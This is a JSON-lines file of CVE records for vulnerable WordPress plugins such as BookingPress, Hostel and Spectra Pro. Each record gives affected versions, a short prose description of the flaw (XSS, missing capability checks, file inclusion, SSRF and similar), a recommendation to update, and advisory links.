{"CVE_ID":"CVE-2023-4725","slug":"simple-posts-ticker","versionImpact":"1.1.5","versionEndExcluding":"1.1.6","description":"The Simple Posts Ticker WordPress plugin before 1.1.6 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 1.1.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e9b9a594-c960-4692-823e-23fc60cca7e7\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e9b9a594-c960-4692-823e-23fc60cca7e7\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4646","slug":"simple-posts-ticker","versionImpact":"1.1.5","versionEndExcluding":"1.1.6","description":"The Simple Posts Ticker WordPress plugin before 1.1.6 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","recommendation":"Update to version 1.1.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c34f8dcc-3be6-44ad-91a4-7c3a0ce2f9d7\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c34f8dcc-3be6-44ad-91a4-7c3a0ce2f9d7\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2401","slug":"qubotchat","versionEndExcluding":"1.1.6","description":"The QuBot WordPress plugin before 1.1.6 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0746ea56-dd88-4fc3-86a3-54408eef1f94\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0746ea56-dd88-4fc3-86a3-54408eef1f94\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2399","slug":"qubotchat","versionEndExcluding":"1.1.6","description":"The QuBot WordPress plugin before 1.1.6 doesn't filter user input on chat, leading to bad code inserted on it be reflected on the user dashboard.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/deca3cd3-f7cf-469f-9f7e-3612f7ae514d\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/deca3cd3-f7cf-469f-9f7e-3612f7ae514d\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6731","slug":"wp-show-posts","versionImpact":"1.1.5","versionEndExcluding":"1.1.6","description":"The WP Show Posts plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on multiple AJAX functions in all versions up to, and including, 1.1.5. This makes it possible for authenticated attackers, with subscriber access and above, to view arbitrary post metadata, list posts, and view terms and taxonomies.","recommendation":"Update to version 1.1.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e6bb3680-0623-4633-971e-3bc4a52dfad3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e6bb3680-0623-4633-971e-3bc4a52dfad3?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3071911%40wp-show-posts%2Ftrunk&old=3041416%40wp-show-posts%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3071911%40wp-show-posts%2Ftrunk&old=3041416%40wp-show-posts%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6660","slug":"bookingpress-appointment-booking","versionImpact":"1.1.5","versionEndExcluding":"1.1.6","description":"The BookingPress \u2013 Appointment Booking Calendar Plugin and Online Scheduling Plugin plugin for WordPress is vulnerable to unauthorized modification of data that can lead to privilege escalation due to a missing capability check on the bookingpress_import_data_continue_process_func function in all versions up to, and including, 1.1.5. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update arbitrary options on the WordPress site and upload arbitrary files. This can be leveraged to update the default role for registration to administrator and enable user registration for attackers to gain administrative user access to a vulnerable site.","recommendation":"Update to version 1.1.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/851ff861-474e-4063-88ff-d8d35b10e9a0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/851ff861-474e-4063-88ff-d8d35b10e9a0?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bookingpress-appointment-booking\\\/trunk\\\/core\\\/classes\\\/class.bookingpress_import_export.php#L476\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bookingpress-appointment-booking\\\/trunk\\\/core\\\/classes\\\/class.bookingpress_import_export.php#L476\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bookingpress-appointment-booking\\\/trunk\\\/core\\\/classes\\\/class.bookingpress_import_export.php#L410\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bookingpress-appointment-booking\\\/trunk\\\/core\\\/classes\\\/class.bookingpress_import_export.php#L410\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bookingpress-appointment-booking\\\/trunk\\\/core\\\/classes\\\/class.bookingpress_import_export.php#L1491\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bookingpress-appointment-booking\\\/trunk\\\/core\\\/classes\\\/class.bookingpress_import_export.php#L1491\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3116857\\\/bookingpress-appointment-booking\\\/trunk\\\/core\\\/classes\\\/class.bookingpress_import_export.php?contextall=1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3116857\\\/bookingpress-appointment-booking\\\/trunk\\\/core\\\/classes\\\/class.bookingpress_import_export.php?contextall=1\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6467","slug":"bookingpress-appointment-booking","versionImpact":"1.1.5","versionEndExcluding":"1.1.6","description":"The BookingPress \u2013 Appointment Booking Calendar Plugin and Online Scheduling Plugin plugin for WordPress is vulnerable to Arbitrary File Read to Arbitrary File Creation in all versions up to, and including, 1.1.5 via the 'bookingpress_save_lite_wizard_settings_func' function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to create arbitrary files that contain the content of files on the server, allowing the execution of any PHP code in those files or the exposure of sensitive information.","recommendation":"Update to version 1.1.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d0177510-cd7d-4cc5-96c3-78433aa0e3f6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d0177510-cd7d-4cc5-96c3-78433aa0e3f6?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3116857\\\/bookingpress-appointment-booking\\\/trunk\\\/core\\\/classes\\\/class.bookingpress.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3116857\\\/bookingpress-appointment-booking\\\/trunk\\\/core\\\/classes\\\/class.bookingpress.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6325","slug":"romethemeform","versionImpact":"1.1.5","versionEndExcluding":"1.1.6","description":"The RomethemeForm For Elementor plugin for WordPress is vulnerable to unauthorized access and modification of data due to a missing capability check on the export_entries, rtformnewform, and rtformupdate functions in all versions up to, and including, 1.1.5. This makes it possible for unauthenticated attackers to export arbitrary form submissions, create new forms, or update any post title or certain metadata.","recommendation":"Update to version 1.1.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/81a293ea-abda-4c90-a109-791ca5ba89a4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/81a293ea-abda-4c90-a109-791ca5ba89a4?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/romethemeform\\\/tags\\\/1.1.2\\\/modules\\\/form\\\/form.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/romethemeform\\\/tags\\\/1.1.2\\\/modules\\\/form\\\/form.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3090708\\\/romethemeform\\\/trunk?contextall=1&old=3079080&old_path=%2Fromethemeform%2Ftrunk\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3090708\\\/romethemeform\\\/trunk?contextall=1&old=3079080&old_path=%2Fromethemeform%2Ftrunk\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12152","slug":"mipl-wc-multisite-sync","versionImpact":"1.1.5","versionEndExcluding":"1.1.6","description":"The MIPL WC Multisite Sync plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 1.1.5 via the 'mipl_wc_sync_download_log' action. This makes it possible for unauthenticated attackers to read the contents of arbitrary files on the server, which can contain sensitive information.","recommendation":"Update to version 1.1.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3215735%40mipl-wc-multisite-sync&new=3215735%40mipl-wc-multisite-sync&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3215735%40mipl-wc-multisite-sync&new=3215735%40mipl-wc-multisite-sync&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3216574%40mipl-wc-multisite-sync&new=3216574%40mipl-wc-multisite-sync&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3216574%40mipl-wc-multisite-sync&new=3216574%40mipl-wc-multisite-sync&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/575d1e24-d23d-4589-bb71-f52efec1ac58?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/575d1e24-d23d-4589-bb71-f52efec1ac58?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3828","slug":"spectra-pro","versionImpact":"1.1.5","versionEndExcluding":"1.1.6","description":"The Spectra Pro plugin for WordPress is vulnerable to privilege escalation in all versions up to, and including, 1.1.5. This is due to the plugin allowing lower-privileged users to create registration forms and set the default role to administrator This makes it possible for authenticated attackers, with author-level access and above, to create administrator-level accounts.","recommendation":"Update to version 1.1.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpspectra.com\\\/whats-new\\\/\",\"name\":\"https:\\\/\\\/wpspectra.com\\\/whats-new\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e23e7d66-4b57-4feb-bf77-46238bc6ce7c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e23e7d66-4b57-4feb-bf77-46238bc6ce7c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6236","slug":"hostel","versionImpact":"1.1.5.8","versionEndExcluding":"1.1.5.9","description":"The Hostel WordPress plugin before 1.1.5.9 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 1.1.5.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ff4d312b-a4d1-40cd-a555-a0a1b46f9959\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ff4d312b-a4d1-40cd-a555-a0a1b46f9959\\\/\",\"refsource\":\"\",\"tags\":[\"Third Party Advisory\",\"Exploit\"]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ff4d312b-a4d1-40cd-a555-a0a1b46f9959\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ff4d312b-a4d1-40cd-a555-a0a1b46f9959\\\/\",\"refsource\":\"\",\"tags\":[\"Third Party Advisory\",\"Exploit\"]}]"}
{"CVE_ID":"CVE-2025-6234","slug":"hostel","versionImpact":"1.1.5.7","versionEndExcluding":"1.1.5.8","description":"The Hostel WordPress plugin before 1.1.5.8 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"Update to version 1.1.5.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7447c4e1-81b9-4415-b425-27491ff692b2\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7447c4e1-81b9-4415-b425-27491ff692b2\\\/\",\"refsource\":\"\",\"tags\":[\"Third Party Advisory\",\"Exploit\"]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7447c4e1-81b9-4415-b425-27491ff692b2\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7447c4e1-81b9-4415-b425-27491ff692b2\\\/\",\"refsource\":\"\",\"tags\":[\"Third Party Advisory\",\"Exploit\"]}]"}
{"CVE_ID":"CVE-2024-4314","slug":"hostel","versionImpact":"1.1.5.3","versionEndExcluding":"1.1.5.4","description":"The Hostel plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.1.5.3. This is due to missing or incorrect nonce validation when managing rooms. This makes it possible for unauthenticated attackers to create and delete rooms via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 1.1.5.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3079755\\\/hostel\\\/trunk?contextall=1&old=3070681&old_path=%2Fhostel%2Ftrunk\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3079755\\\/hostel\\\/trunk?contextall=1&old=3070681&old_path=%2Fhostel%2Ftrunk\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6a8c5d9b-4535-4edb-a92e-a9b83a0d22c3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6a8c5d9b-4535-4edb-a92e-a9b83a0d22c3?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3753","slug":"hostel","versionImpact":"1.1.5.2","versionEndExcluding":"1.1.5.3","description":"The Hostel WordPress plugin before 1.1.5.3 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","recommendation":"Update to version 1.1.5.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e140e109-4176-4b26-bf63-198262a31409\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e140e109-4176-4b26-bf63-198262a31409\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0545","slug":"hostel","versionEndExcluding":"1.1.5.2","description":"The Hostel WordPress plugin before 1.1.5.2 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b604afc8-61d0-4e98-8950-f3d29f9e9ee1\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b604afc8-61d0-4e98-8950-f3d29f9e9ee1\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10671","slug":"button-block","versionImpact":"1.1.4","versionEndExcluding":"1.1.5","description":"The Button Block \u2013 Get fully customizable & multi-functional buttons plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 1.1.4 via the [btn_block] shortcode due to insufficient restrictions on which posts can be included. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract data from password protected, private, or draft posts that they should not have access to.","recommendation":"Update to version 1.1.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3188802\\\/button-block\\\/tags\\\/1.1.5\\\/inc\\\/class-button-block-common.php?old=3176453&old_path=button-block%2Ftags%2F1.1.4%2Finc%2Fclass-button-block-common.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3188802\\\/button-block\\\/tags\\\/1.1.5\\\/inc\\\/class-button-block-common.php?old=3176453&old_path=button-block%2Ftags%2F1.1.4%2Finc%2Fclass-button-block-common.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/99c7eead-2cf2-4663-9328-671274f3c436?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/99c7eead-2cf2-4663-9328-671274f3c436?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11010","slug":"fileorganizer","versionImpact":"1.1.4","versionEndExcluding":"1.1.5","description":"The FileOrganizer \u2013 Manage WordPress and Website Files plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 1.1.4 via the 'default_lang' parameter. This makes it possible for authenticated attackers, with Administrator-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \u201csafe\u201d file types can be uploaded and included.","recommendation":"Update to version 1.1.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/fileorganizer\\\/trunk\\\/init.php#L222\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/fileorganizer\\\/trunk\\\/init.php#L222\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/fileorganizer\\\/trunk\\\/main\\\/fileorganizer.php#L149\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/fileorganizer\\\/trunk\\\/main\\\/fileorganizer.php#L149\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3201635\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3201635\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8e958653-36c4-4979-89e1-d9411a35a92a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8e958653-36c4-4979-89e1-d9411a35a92a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4828","slug":"bold-timeline-lite","versionEndExcluding":"1.1.5","description":"The Bold Timeline Lite WordPress plugin before 1.1.5 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/06e1d63e-576b-4e16-beb7-4f0bfb85e948\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/06e1d63e-576b-4e16-beb7-4f0bfb85e948\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3677","slug":"ultimate-410","versionImpact":"1.1.4","versionEndExcluding":"1.1.5","description":"The Ultimate 410 Gone Status Code plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 410 entries in all versions up to, and including, 1.1.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.1.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7c10be28-43ff-4b43-8186-6ad9a487321e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7c10be28-43ff-4b43-8186-6ad9a487321e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3074532%40ultimate-410&new=3074532%40ultimate-410&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3074532%40ultimate-410&new=3074532%40ultimate-410&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3827","slug":"spectra-pro","versionImpact":"1.1.4","versionEndExcluding":"1.1.5","description":"The Spectra Pro plugin for WordPress is vulnerable to Stored Cross-Site Scripting via block ids in all versions up to, and including, 1.1.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.1.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3fb6123c-2891-4cfd-8d68-a922c30d7600?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3fb6123c-2891-4cfd-8d68-a922c30d7600?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpspectra.com\\\/product\\\/spectra-pro\\\/#spectra-pro-1-1-5-released\",\"name\":\"https:\\\/\\\/wpspectra.com\\\/product\\\/spectra-pro\\\/#spectra-pro-1-1-5-released\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1479","slug":"wp-show-posts","versionImpact":"1.1.4","versionEndExcluding":"1.1.5","description":"The WP Show Posts plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.1.4 via the wpsp_display function. This makes it possible for authenticated attackers with contributor access and above to view the contents of draft, trash, future, private and pending posts and pages.","recommendation":"Update to version 1.1.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6788e2ee-ce61-494b-8d7f-6d1144466e58?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6788e2ee-ce61-494b-8d7f-6d1144466e58?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-show-posts\\\/trunk\\\/wp-show-posts.php#L224\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-show-posts\\\/trunk\\\/wp-show-posts.php#L224\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-show-posts\\\/trunk\\\/wp-show-posts.php#L591\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-show-posts\\\/trunk\\\/wp-show-posts.php#L591\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3041416%40wp-show-posts%2Ftrunk&old=2846296%40wp-show-posts%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3041416%40wp-show-posts%2Ftrunk&old=2846296%40wp-show-posts%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5536","slug":"gamipress-link","versionImpact":"1.1.4","versionEndExcluding":"1.1.5","description":"The GamiPress \u2013 Link plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's gamipress_link shortcode in all versions up to, and including, 1.1.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.1.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6c3954af-f7db-495c-b6f0-49f24d6f4b18?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6c3954af-f7db-495c-b6f0-49f24d6f4b18?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3096646%40gamipress-link%2Ftrunk&old=2989725%40gamipress-link%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3096646%40gamipress-link%2Ftrunk&old=2989725%40gamipress-link%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7810","slug":"streamweasels-kick-integration","versionImpact":"1.1.4","versionEndExcluding":"1.1.5","description":"The StreamWeasels Kick Integration plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'data-uuid' attribute in all versions up to, and including, 1.1.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.1.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/streamweasels-kick-integration\\\/trunk\\\/public\\\/js\\\/streamweasels-kick-public.js#L574\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/streamweasels-kick-integration\\\/trunk\\\/public\\\/js\\\/streamweasels-kick-public.js#L574\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3335307#file11\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3335307#file11\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b564eacd-1561-4c42-8a9e-395d4e951723?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b564eacd-1561-4c42-8a9e-395d4e951723?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1938","slug":"wp-fastest-cache","versionEndExcluding":"1.1.5","description":"The WP Fastest Cache WordPress plugin before 1.1.5 does not have CSRF check in an AJAX action, and does not validate user input before using it in the wp_remote_get() function, leading to a Blind SSRF issue","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/92b1c6d8-51db-46aa-bde6-abdfb091aab5\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/92b1c6d8-51db-46aa-bde6-abdfb091aab5\",\"refsource\":\"MISC\",\"tags\":[]}]"}
